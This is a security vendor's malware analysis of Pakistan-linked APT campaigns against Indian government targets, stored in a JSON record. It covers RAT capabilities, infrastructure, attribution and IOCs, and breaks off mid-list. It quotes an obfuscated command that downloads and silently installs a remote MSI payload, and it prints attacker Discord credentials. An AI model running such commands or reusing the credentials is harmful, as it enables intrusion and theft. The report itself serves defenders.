{ "id": "fd41fd2f-93d1-4454-8ab9-d5f2d92e9e92", "created_at": "2026-04-06T01:31:59.351554Z", "updated_at": "2026-04-10T13:12:51.296683Z", "deleted_at": null, "sha1_hash": "6ad77b985f6bb09a34b6c121621cbbc727001a2a", "title": "Umbrella of Pakistani Threats: Converging Tactics of Cyber-operations Targeting India", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7649423, "plain_text": "Umbrella of Pakistani Threats: Converging Tactics of Cyber-operations Targeting India\r\nBy Sathwik Ram Prakki\r\nPublished: 2024-07-25 · Archived: 2026-04-06 01:26:25 UTC\r\nAn open directory hosting malware linked to Transparent Tribe (APT36) has been found by SEQRITE Labs APT\r\nteam. Further analysis revealed hidden URLs on the same domain containing payloads used by its sub-division\r\nAPT group SideCopy. Targeting of Indian government entities such as Air Force, shipyards and ports by SideCopy\r\nis observed via multiple open directories that hosted its newer payloads. A strong correlation between these groups\r\nalong with RusticWeb; including domain/IP, C2 name, decoy files, and more overlaps have been observed. In this\r\nblog, we will explore these payloads and the overlaps seen during the recent increase in such campaigns.\r\nKey Findings\r\nAPT Overlaps\r\nA domain is found to be hosting payloads of both SideCopy and APT36 together, targeting Windows and\r\nLinux environments respectively.\r\nThe C2 server used by SideCopy’s RAT payloads has the same Common Name (WIN-P9NRMH5G6M8)\r\ntypically associated with that of APT36.\r\nBoth threat groups along with RusticWeb, use the same lure file in various formats, infrastructure and web-services in their infection chains making their connections stronger.\r\nSideCopy Infections\r\nUsing updated HTA same as SideWinder to evade detections, making it fully undetectable (FUD). Encoded\r\nURLs that hosted RTF files of SideWinder APT group were found in SideCopy’s stager.\r\nReverse RAT is delivered via MSI packages using an ‘Indian Air Force’ theme as a decoy, and in-memory\r\nvariants of Reverse RAT were also seen. More open directories were found on another two domains hosting\r\nDOTM files to deliver Reverse RAT via BAT files, targeting shipyards \u0026 ports.\r\nNew payloads used to steal documents and images called Cheex, a USB copier to steal files from attached\r\ndrives, FileZilla application and SigThief scripts were also seen.\r\nTesting of stager evasion against anti-virus at Pakistan locations has been identified. At the same time,\r\nvictim traffic from India that is typically observed from C2 located in Germany is being routed through\r\nIPsec protocol from Pakistan IPs, as shared by The Brofessor from Team Cymru.\r\nA new .NET-based payload named Geta RAT executed in-memory of HTA, incorporates browser stealing\r\nfunctionality from Async RAT. Parallelly, Action RAT is side-loaded by charmap.exe instead of the\r\ncredwiz.exe/reykeywiz.exe and usage a honey trap theme named as ‘WhatsApp Image’ is seen.\r\nTransparent Tribe Infections\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 1 of 36\n\nA Golang-based downloader targeting Linux systems is used to fetch the final payload from Google Drive.\r\nThis final payload was recently seen to be fetched from a domain instead and has been named DISGOMOJI\r\nby Volexity, where “weak infrastructure links to SideCopy” were mentioned.\r\nThe group continues to target the Linux platform with Poseidon using desktop shortcuts having lure themes\r\nsuch as ‘Posting/Transfer under Ph-III of Rotational Transfer’, ‘Blacklist IP Address with TLP \u0026 Dates’\r\nand ‘LTC checklist’.\r\nThe use of Crimson RAT, with ‘Uttarakhand Election Result’ and ‘TDS Claim Summary’ baits along with\r\nembedding of the FileZilla application, has also been observed.\r\nFig. 1 – Overlapping Infection Chain\r\nOverlapping Attack\r\nThe domain found with the open directory is campusportals[.]in with multiple folders hosted on it. These contain\r\nGolang-based Linux payloads attributed to APT36, but at the same time, multiple hidden URLs were observed\r\nhosting HTA stagers that belong to SideCopy APT. The domain originally served as a guide to various Indian\r\nentrance exams, where the last post on their Twitter/YouTube was done in 2016. A similar open directory was\r\nobserved earlier hosting SideCopy stagers on the same software LiteSpeed Web Server. The domain in this case,\r\nreviewassignment[.]in was used for another education portal, which is early childhood education and care services.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 2 of 36\n\nFig. 2 – Open Directory hosting APT36 and hidden URLs with SideCopy stagers\r\nA ZIP archive is present in one of the directories, this contains a password-protected PDF and a UPX-packed ELF\r\nbinary. Unpacking this shows a Golang binary that acts as a downloader, where it first opens the decoy PDF using\r\nthe passcode ‘745414’. The lure theme is a survey on internet usage which was observed in multiple previous\r\ncampaigns of SideCopy since February 2023.\r\nFig. 3 – Internet survey lure\r\nThen it downloads the next stage payload from Google Drive as gnucoreinfo to the hidden directory .x86_32-linux-gnu, makes it executable, and starts it in the background. Persistence is set up via two AutoStart desktop entries\r\nnamed – GNOME_Core.desktop and GNULib_Update.desktop. A bash script is dropped and registered for a cron\r\njob to download the payload and make sure that a duplicate process is not running as shown below.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 3 of 36\n\nFig. 4 – Process of Golang downloader in persistence script\r\nVariant of DISGOMOJI\r\nThe final payload is another UPX-packed Golang-based ELF binary named ‘vmcoreinfo.txt’. This is a remote\r\naccess trojan based on an open-source repository discord-c2, that uses a Discord server as a C2 and emojis for\r\ncommunication. Volexity has observed different variants of DISGOMOJI, where server ID and bot token of\r\nDiscord server are either hardcoded or downloaded at runtime as BID1.txt and GID1.txt from ordai[.]quest. In this\r\nversion, Google Drive is used to download them with the following names that conveys it to be a second server:\r\nFilename Details and Google Drive Download Links\r\nBID2.txt\r\nMTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM\r\n(Server ID)\r\nhxxps://drive.google.com/uc?export=download\u0026id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe\r\nGID2.txt\r\n1246900038160879688 (Bot Token)\r\nhxxps://drive.google.com/uc?export=download\u0026id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t\r\nGTK-Theme-Parse.txt\r\n2bf596603c432fa46b494dc3edd2d30f (MD5)\r\nhxxps://drive.google.com/uc?export=download\u0026id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_\r\nAll the error handling messages present try to mislead from the actual functionality, but one interesting error name\r\nis observed to be “Error updating Kavach Repository: %v“. An obfuscated file named GTK-Theme-Parse.txt is\r\ndownloaded, which serves to periodically copy files from connected USB drives to a local directory. A cron job is\r\nset up similarly for persistence and these files could be exfiltrated using the emoji-based RAT.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 4 of 36\n\nFig. 5 – Obfuscated USB stealer script\r\nDISGOMOJI gathers basic system details initially and its functionality includes taking screenshots, execute\r\ncommands, upload files to web services (oshi[.]at and transfer[.]sh), download and upload files via discord server,\r\nget Firefox browser profiles, and find files based on extension to exfiltrate. The last one has a unique string in\r\nPunjabi (most popular language in Pakistan) that translates to “I have given you all the knowledge, what else do\r\nyou want?”, apt for data exfiltration. New Windows and Linux variants of PYSHELLFOX and GLOBESHELL for\r\nexfiltrating files and stealing Firefox profiles were also mentioned by BlackBerry.\r\nFig. 6 – Exfiltration message\r\nVariant of Poseidon\r\nWe have also observed continuous deployment of Poseidon agents via Linux desktop shortcuts by Transparent\r\nTribe, where the bait files were hosted similarly on Google Drive having fikumatry\u003cat\u003egmail.com and\r\nfitfalcon0900\u003cat\u003egmail.com as the owner of the account. The three different decoys observed are all related to\r\nvarious Indian government documents. These are  osting/transfer of officers under Ministry of Defence\r\nfrom previous year, blacklisted IP addresses with TLP \u0026 dates, and a check list for LTC claims.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 5 of 36\n\nFig. 7 – IP blacklist decoy with Poseidon (1)\r\nFig. 8 – Checklist decoy with Poseidon (2)\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 6 of 36\n\nFig. 9 – Posting/Transfer decoy with Poseidon (3)\r\nSideCopy\r\nBased on the URLs seen in a recent SideCopy infection, similar hosting of HTA stagers were identified along with\r\nsame baits. The infection starts with an archived shortcut file, that starts the MSHTA process to execute remote\r\nHTA files hosted on this same domain. In total, six HTA files were found named as either 1.hta or 2.hta. The first\r\nHTA variant has two base64 decode functions, one based on JavaScript, and the other uses ActiveX objects. The\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 7 of 36\n\nfunctionality for this remains the same, which includes .NET version check, AV solution installed, concatenating\r\npayload and decoding strings, and finally executing DLL in-memory along with passing the decoy file.\r\nFig. 10 – HTA stager 2nd variant\r\nThe second HTA variant is heavily obfuscated and observed only at times since last year that uses multiple\r\ntechniques:\r\nDecode a base64-like encoded string using a custom alphabet\r\nXOR based decryption (with keys: f551e832 and bWqQ)\r\nString reversal for every 1/2/5 characters\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 8 of 36\n\nCaesar cipher shift using multiple keys\r\nFig. 11 – Deobfuscation in HTA\r\nThe overall functionality remains the same, but these obfuscation patterns were seen in HTA of SideWinder APT\r\nsince last year. Strings that are not used anywhere in the script contain URLs (cabinet-gov-pk[.]ministry-pk[.]net)\r\nthat hosted RTF files of SideWinder a few years back.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 9 of 36\n\nFig. 12 – SideCopy stager with SideWinder URLs (comments from analysis)\r\nIn-memory preBotHta DLL performs the usual sequence of opening decoy and getting AV solution installed. Based\r\non the AV solution, it sets persistence as a combination of scheduled task (VBScript), run registry key or startup\r\nshortcut. Ultimately it either drops two additional HTA files or downloads MSFTEDIT.dll (Action RAT) from\r\n‘hxxps://campusportals.in//files//documents//backup//ap.txt’ that is side loaded by charmap.exe which connects\r\nwith 64.188.27[.]144 on port 5863 for C2.\r\nFig. 13 – SideWinder domain hosting RTF files\r\nThe HTA files dropped are named as useH, useT and alphaT, that have the same HTA functionality mentioned\r\nabove and execute a DLL in-memory at the end. Two different DLLs are found, one is Reverse RAT that includes\r\n19 commands for C2 along with USB file grabber, to save file and folders whenever a new drive is attached. The\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 10 of 36\n\nsecond one is a new .NET-based Geta RAT with 30 commands for C2, that can also steal both Firefox and\r\nChromium-based browser data of all accounts, profiles and cookies. This browser plugin is borrowed from Async\r\nRAT as shown below.\r\nFig. 14 – Geta RAT vs. Async RAT\r\nNo Command Functionality\r\n1 Disconnected Close the connection\r\n2 SystemInformation\r\nGet system data (computer name, username, screen size, available \u0026 total\r\nmemory (physical and virtual), OS details, battery power status, system up\r\ntime, drivers, network details)\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 11 of 36\n\n3 pkill Kill specific process and fetch process list\r\n4 ProcessManager Get process list\r\n5 Software Get installed softwares\r\n6 Passwords\r\nGet Firefox and chromium-based browser credentials from all\r\naccounts/profiles/cookies\r\n7 RD Get screenshot of remote desktop\r\n8 GetPcBounds Get screen size\r\n9 SetCurPos Set cursor position\r\n10 GetHostsFile Get \\etc\\hosts file\r\n11 SaveHostsFile Save \\etc\\hosts file at specified location\r\n12 GetCPText Get clipboard contents\r\n13 SaveCPText Save clipboard contents at specified location\r\n14 Shell Run command via “cmd /C”\r\n15 RecordingStart No functionality defined but most likely used for screen capture\r\n16 RecordingStop No functionality defined but most likely used for screen capture\r\n17 RecordingDownload No functionality defined but most likely used for screen capture\r\n18 ListDrives Get drives list\r\n19 ListFiles Get files and directories for specified path\r\n20 mkdir Create a new directory\r\n21 rmdir Delete a directory\r\n22 rnfolder Rename a directory\r\n23 mvdir Move a directory\r\n24 rmfile Delete a file\r\n25 rnfile Rename a file\r\n26 sharefile Download a file\r\n27 run Execute a file\r\n28 Execute 1. Upload a file and execute it via DLL Side-loading\r\n2. Execute “cmd /C netstat -ano” and get connection status of server IP\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 12 of 36\n\n3. Get installed AV\r\n29 addSys Set persistence via registry or startup\r\n30 fileupload Upload a file\r\nTwo similar iterations of HTA resembling CACTUS TORCH and SILENT TRINITY were observed but have\r\nevaded detections completely. These get executed via shortcut files and is utilizing themes such as honey trap and\r\nUS China standoff to eventually drop the final payload.\r\nFig. 15 – New HTA stager\r\nThe differences noted in this new HTA though functionality remains the same:\r\nApart from base64 decoding, another function with specified length to decode data is used. Primarily the\r\nembedded DLL is encoded twice using these functions.\r\nThe decoy and side-loaded DLL are not embedded separately in the HTA but in the .NET DLL itself.\r\nDoes not use WMI queries to get AV installed nor VBScript to get .NET version.\r\nImportantly, no target is specified to create instance and invoke dynamically.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 13 of 36\n\nFig. 16 – Simplified HTA version\r\nInstead of loading preBotHta or SummitOfBion in-memory, BroaderAspect.dll is seen where it drops the decoy and\r\nopens it. No check of anti-virus is done but registry run key is set for persistence and the DLL (DUser.dll) is\r\ndropped to sideload via rekeywiz. The target directory is ‘C:\\Users\\Public\\BroadCastUSB\\crezly.exe’ and the PDB\r\npath associated with two files is: ‘E:\\TestAssembly\\obj\\Debug\\BroaderAspect.pdb’.\r\nFig. 17 – DLL run in-memory of MSHTA\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 14 of 36\n\nReverse RAT campaigns\r\nMultiple infections leading to Reverse RAT have been observed that used lures and fake domains related to various\r\nship building docks, ports and even Air Force. All these entities are administered under Indian Government’s\r\nMinistry of Defence (MoD) and Ministry of Ports, Shipping and Waterways (MOPSW).\r\nFig. 18 – Reverse RAT infection and targets\r\nA standalone variant of Reverse RAT is dropped via MSI package during the same timeline. ZIP file named\r\n‘Salary_Increment_FY_2024’ contains an LNK shortcut to download and execute an MSI package as:\r\nC:\\Windows\\System32\\cmd.exe /c m^s^i^e^x^e^c.exe /q /i\r\nhxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/\r\nThe package is comprised of a .NET Confuser PE file that gets executed during custom action \u0026 installation\r\nsequences as shown in the image below. Reverse RAT is dropped as “C:\\\\ProgramData\\\\VSUpdates\\\\svirbre.exe”\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 15 of 36\n\nat the end with the same 19 commands for C2 and persistence for it is set via another HTA script fileros.hta with\r\nthe run registry key.\r\nNo Command Functionality\r\n1 run Execute a file\r\n2 list List files or directories of a path\r\n3 pkill Kill a running process\r\n4 close Close the connection with the C2\r\n5 rename Rename a file\r\n6 screen Take a screenshot\r\n7 upload Upload a file to C2\r\n8 delete Delete a file\r\n9 reglist List all registry keys and their values\r\n10 process List all running processes\r\n11 programs List all installed programs\r\n12 download Download a file from C2\r\n13 creatdir Create a new directory\r\n14 shellexec Execute a command or open a file using cmd.exe\r\n15 regnewkey Create a new registry key\r\n16 clipboard Retrieve the clipboard content\r\n17 regdelkey Delete a registry key\r\n18 downloadexe Download and execute a file\r\n19 clipboardset Set the clipboard content\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 16 of 36\n\nFig. 19 – MSI package to drop Reverse RAT\r\nInfection chain with payloads is as follows:\r\nFilename Details\r\nSalary_Increment_FY_2024.zip Modify Date: 2024-06-03\r\nSalary_Increment_FY_2024.pdf.lnk Machine ID: cop125n, Modify Date: 2023-12-04\r\nnewpictures.png (MSI) Modify Date: 2020-09-18, Author: MSTech Soft\r\nFilmeos.exe .NET Confuser 1.x\r\nsvirbre.exe (Reverse RAT)\r\nKey: winupdates@7\r\nC2: defender.windowupdatecache[.]in/officalupdates\r\nThe decoy dropped contains salary increment details given to the employees of the Indian Air Force. It is a recent\r\ndocument mentioning the effective payout date as July 2024.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 17 of 36\n\nFig. 20 – Indian Air Force pay decoy\r\nMore open directories\r\nIn July, two more domains with open directories were seen that hosted both new and old SideCopy payloads as\r\nseen with the timestamps. These contain multiple EXE, PNG, PDF, BAT, and other documents used in Reverse\r\nRAT campaigns. The domain slidesfinder[.]com hosted July samples that fetches payloads from another domain\r\nmazagondoc[.]com, which in turn hosted files in October 2023 for template injection attacks.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 18 of 36\n\nFig. 21 – Open directories hosting SideCopy payloads\r\nTwo macro-enabled template documents named Aerospace.dotm and tmps.dotm were observed that begins the\r\ninfection chain. Obfuscated subroutines get executed upon opening the document, where it downloads the hosted\r\nPNG file as a batch script “08973422348.bat” into the TEMP directory, if the HTTP response is 200. If the file\r\nexists, it runs the batch file using the Shell function.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 19 of 36\n\nFig. 22 – VBA macro in template documents\r\nIn one of the templates, it later calls UNLK subroutine that changes the attached template of the active document to\r\nthe Normal.dotm template in the user’s directory, and then closes the document without saving changes. If an error\r\noccurs, it calls the DVBP subroutine that attempts to remove all VBA components from the document, thereby\r\ndeleting all VBA code. The batch script shown below essentially downloads the Reverse RAT payload as PNG\r\nusing PowerShell, copies it to a hidden directory and creates a scheduled task to run every 5 minutes.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 20 of 36\n\nFig. 23 – Batch script to download Reverse RAT\r\nThe decoy file Letter002.pdf is also downloaded and opened simultaneously, which corresponds to contract details\r\nof Cochin Shipyard Limited during January 2024, operating under Ministry of Ports, Shipping and Waterways. All\r\nthese monthly contract details are available publicly on their legitimate domain. Apart from listening for the 19\r\ncommands, Reverse RAT downloads another file from mazagondoc[.]com domain, mimicking the official Ministry\r\nof Defence’s Mazagon Dock Shipbuilders Limited – mazagondock[.]in website. This domain hosting payloads was\r\nalso observed in October 2023 campaign delivering Revere RAT with similar targeting. The C2 seen with Reverse\r\nRAT is vocport[.]com/Contactus, which is mimicking domain of V. O. Chidambaranar Port Authority under the\r\nMinistry of Ports, Shipping and Waterways.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 21 of 36\n\nFig. 24 – Decoy with contract details of Cochin Shipyard\r\nMore and more of .NET\r\nA new .NET-based payload is downloaded and run which has the functionality to search \u0026 save files with specific\r\nextension. These are later exfiltrated to the following servers as seen with two samples:\r\nhxxp://149.28.95.195/dakshf_upload.php\r\nhxxps://googleservices[.]live/dakshf_upload.php\r\nThese samples also contain the PDB path of the source project under the username “Dead Snake” with name as\r\ncheex (an unrelated online platform with this name is present). It checks five folders – Desktop, Personal, Common\r\nDocuments, Downloads and Recent for files with these 12 extensions – DOCX, DOC, XLSX, XLS, PPTX, PPT,\r\nPDF, BAK, JPEG, JPG, PNG and TXT.\r\nC:\\Users\\Dead Snake\\source\\repos\\cheex-folderwise\\cheex\\obj\\Release\\dlhost.pdb\r\nC:\\Users\\Dead Snake\\source\\repos\\cheex\\cheex\\obj\\Debug\\cheex.pdb\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 22 of 36\n\nFig. 25 – New payloads for file exfiltration\r\nAs seen with Reverse RAT above delivered via MSI that included functionality for file exfiltration from attached\r\nUSB devices, now that is present as a separate module altogether. All drive letters are enumerated, and files are\r\ncopied to TEMP directory using background workers before uploading them to the same IP. PDB paths observed\r\nfor two samples is:\r\ne:\\DBD\\MA\\Miscelleneous\\Usb-Copier\\Usb-Copier\\FileCorrupter\\obj\\x86\\Release\\AdobeReaders.pdb\r\ne:\\DBD\\MA\\Miscelleneous\\Usb-Copier\\Usb-Copier\\FileCorrupter\\obj\\x86\\Debug\\AdobeReaders.pdb\r\nOther files observed are macro-enabled documents, decoys, FileZilla application (used for file transfer) and an\r\nopen-source python script SigThief used to steal and append signatures, were hosted related to previous\r\ncampaigns.\r\nNaval_Projects_Payment_section_Report_29092023.docx\r\nNaval_Projects_Payment_section_Report_131023.docx\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 23 of 36\n\nProject_and_Services_Section_report_10102023.docx\r\nLetter002.pdf\r\nNavalProjects.pdf\r\nOther decoy documents that are used in 2023 campaigns were also found on the same domain. These are related to\r\nport entry permit for government’s V. O. Chidambaranar Port Authority and invoice status of vendors related to\r\nNaval Projects. These lures are publicly available documents.\r\nFig. 26 – Naval port themed decoy from Oct 2023 campaign\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 24 of 36\n\nFig. 27 – Naval project invoice themed decoy from Oct 2023 campaign\r\nInfrastructure and Attribution\r\nBased on our analysis so far, we have observed overlaps between three Pakistan-linked APT groups. Transparent\r\nTribe is known to utilize a diverse set of techniques, languages such as Golang, Python, etc. and Operation\r\nRusticWeb has utilized Rust-based payloads. Both these are using oshi[.]at web service, two same PDF bait\r\ndocuments and their fake domains resolved to the same IP address as observed by BlackBerry and Volexity.\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 25 of 36\n\nFig. 28 – Pakistani APT overlaps\r\nSimilarly, overlaps between SideCopy and APT36 have been observed such as lures, Linux-stager to drop Ares\r\nRAT and Poseidon respectively, payloads based on AllaKore RAT and the common name for C2. We attribute that\r\nRusticWeb is directly linked to APT36 with medium to high confidence, similar to SideCopy acting as a sub-team\r\nof APT36.\r\nThe fake/compromised domains used to host payloads resolve to the following IP addresses where two of them are\r\nseen with common name as WIN-BEJO0EMFO5K.\r\nDomain IP ASN\r\ncampusportals[.]in 192.64.117[.]203 AS22612 – Namecheap\r\nmazagondoc[.]com\r\n172.67.217[.]17\r\nCN=WIN-BEJO0EMFO5K\r\nAS13335 – Cloudflare\r\nslidesfinder[.]com\r\n103.133.215[.]65\r\nCN=WIN-BEJO0EMFO5K\r\nAS133643 – Ewebguru, India\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 26 of 36\n\ndipl[.]site 151.106.117[.]91 AS47583 – Hostinger\r\nutkalsevasamitikanjurmarg[.]in 162.0.209[.]114 AS22612 – NameCheap\r\nLooking at the C2 servers, the IP 64.188.27[.]144 was used with Action RAT and Geta RAT on same ports but\r\neven the Reverse RAT C2 checkdailytips.servehttp[.]com resolved to that IP. The common name associated with it\r\nWIN-P9NRMH5G6M8 is found in most C2 servers of APT36.\r\nFig. 29 – IP with Common Name of APT36\r\nThe domain vocport[.]com is used now as well as in past campaigns from October 2023. Whois details of all C2\r\nservers with their payloads observed are as follows:\r\nIP ASN Payload\r\nvocport[.]com\r\n104.21.40[.]190\r\n172.67.156[.]79\r\nAS13335 – Cloudflare Reverse RAT\r\ndefender.windowupdatecache[.]in\r\n172.67.128[.]127\r\nAS13335 – Cloudflare Reverse RAT\r\ncheckdailytips.servehttp[.]com\r\ndns1.indianblog[.]xyz\r\n64.188.27[.]144\r\nAS8100 – QuadraNet\r\nCN=WIN-P9NRMH5G6M8\r\nReverse RAT, Action RAT, Geta RAT\r\ngoogleservices[.]live\r\n149.28.95[.]195\r\nAS13335 – Cloudflare\r\nAS20473 – Choopa\r\nCheex, USB-Copier\r\n84.247.170[.]237 AS51167 – Contabo New RAT\r\n165.22.221[.]71\r\n178.128.166[.]148\r\n152.42.162[.]105\r\n161.35.207[.]209\r\nAS 14061 – DigitalOcean Poseidon\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 27 of 36\n\n159.65.146[.]80\r\n157.245.100[.]177\r\nBased on this correlation and previous attack chains, these campaigns are attributed to both APT36 and SideCopy\r\ngroups with high confidence, establishing yet another strong connection between them.\r\nConclusion\r\nMultiple open directories hosting stagers/payloads linked to Pakistan APT groups has been discovered that targeted\r\nIndia Air Force, ports \u0026 shipyards under government entities. Various cyber operations have been observed where\r\noverlap between Transparent Tribe, SideCopy and RusticWeb is found.\r\nAPT36 focus is majorly Linux systems whereas SideCopy targets Windows systems adding new payloads to its\r\narsenal. In the second quarter of 2024, multiple Pakistani-linked threat groups targeting India have been reported,\r\nthat use android-based malware. These include Operation Celestial Force tracked as Cosmic Leopard and another\r\nnew group leveraging WhatsApp to deliver SpyNote RAT. It is suggested to take necessary precautions and stay\r\nprotected amidst the continuous cyber-attacks on India.\r\nSEQRITE Protection\r\nLnk.Sidecopy.48846.Gen_GC\r\nMSI.Sidecopy.48847.GC\r\nJS.Sidecopy.48848.Gen_GC\r\nDocx.APT36.48849.GC\r\nELF.Agent.48863.GC\r\nELF.Agent.48860.GC\r\nO97M.Dropper.DZ\r\nBAT.Downloader.48924\r\nXML.SideCopy.48922\r\nXML.SideCopy.48923\r\nTrojanAPT.ReverseRAT.S33893087\r\nIOCs\r\nSideCopy\r\nHTA\r\nced11422832a7380381323ae78a7a9bc\r\nf270105309e6574cab7a6acb1efb3c20\r\nc574b2ebcc0aff84a23f1215f8a803be \r\n1.hta\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 28 of 36\n\n4938f42a3d691ef78f1ee8edc3b38f87\r\n817532c454637a302238a4751694c336\r\ne2f8fbc105a84283e191362f4ca07ae4\r\n2.hta\r\n7c3b49f642f19116878b2c190f344f63 alphaT.hta\r\nf6a58b0d267c7c53ccbcc6dafafd499b\r\nf55afc8192f30ff7a584dbda700383d1\r\nuseH.hta\r\nd6ae362b4b3f7a67949d177fdfc6bdec useT.hta\r\n907ba4486c589f2cb4a45b92f2a5350e Imge12542.hta\r\n336316c1b5ed77d31b4adc06e06a2f84 ugt254d.hta\r\nLNK\r\nf60c1a04161f354f0c6ac4678b3062d0 Salary_Increment_FY_2024.pdf.lnk\r\n4dfdacf33db6ae0341b4d0e65aa3d755 WhatsApp_Image_2024-05-06.lnk\r\n2041d2347f78ce03c1f9e990724adf3c US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.lnk\r\nZIP\r\nfe8bf0bf2697d5e43e38d4b0364485a6 Salary_Increment_FY_2024.zip\r\nb99717d81e142e58af91efb4d5288bda WhatsApp_Image_2024-05-06.zip\r\n109897ba1f92339f9dc9a74dc38dfc88 US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip\r\nMaldoc\r\n807e6c1094b760e748a84ef9e05bc1f8 Aerospace.dotm\r\nabb863131bbffad1dd8ee72d0758f34b tmps.dotm\r\neebb4913b54af93bcfc7d56e081502af Project_and_Services_Section_report_10102023.docx\r\ne73b0354790273b0fcaa8c2deab3ad87 Naval_Projects_Payment_section_Report_131023.docx\r\n44b23edd6c9a63a2a38f1bf3d4ff5bb9 Naval_Projects_Payment_section_Report_29092023.docx\r\n354716db015373c089744e7319cd93d3 Naval_Projects_Payment_section_Report_29092023.docx\r\nOthers\r\n6b45d5f194e2799e5178c8d858673900 08978.png (BAT)\r\n56fd3a2f701d30fe3e5ebdd0d471f1ed newpictures.png (MSI)\r\nEXE\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 29 of 36\n\n2478a5f6b82461eb06f3099478c4e2f6 DUser.dll\r\n97113b266fbff61d8d2f92793672688d Filmeos.exe\r\n96764912417d260653b6949afb0ad25c Chromes.exe\r\n6a0adcf34a2f0ac21089b994dff02b85 Filezilla.exe\r\nReverse RAT\r\na7a71259bdf700807a763119fd652e73 svirbre.exe / Fantos.exe\r\nc006701ec5025222a74a419f8c238689 Postgrex.exe / rtloki.png\r\nd5719a9ef7a6f012e26d0c86b4a676d9 igfxm.exe / rt12.png\r\ne6404136626a446b46bf4ecaa885560e igfxtk.exe\r\nCheex\r\n825c7a1603f800ff247c8f3e9a1420af AdobeArm.exe / dlhost.exe\r\n253957d7df5c7e70ec9001766e8f087b cheex.exe\r\nUSB Copier\r\n3d2001c112290c019afcd51fede564d3 AdobeReaders.exe / msedg.exe\r\n7ca8532b081f8612d1c0b6ea01d40299 AdobeReaders.exe / msedgprefix.exe\r\nDecoys\r\n5e88b5122ae380c4b4741dcf0bdca198 Salary_Increment_FY_2024.pdf\r\ne415374f1f9533f10f706f0a9124b0d4 WhatsApp Image 2024-05-06 at 12.23.08 AM.jpeg\r\ne79ca3852ae5e14766544ec1d5d4d268 US China standoff – Opportunity for India Chadha 21 Aug 23.pdf\r\ncc0b292144ccdf4a95014809258982c4 Letter002.pdf\r\n584ce9670a6f6a16eaaa615d64788f68 NavalProjects.pdf\r\nb2e007c6bde2d2ce03a5257732df95b2 001doc.pdf\r\nd254f6d56ad874c5095b92d620cb5b80 IT Trends.docx\r\n5fc559e4b663c20c9d5ea46fd164f4c7 Survey.docx\r\nf997a21e9f7ad5eb9242b4decb7fdeb9 India Emerging Global Economy.docx\r\nDomains (fake/compromised)\r\nutkalsevasamitikanjurmarg[.]in 162.0.209[.]114\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 30 of 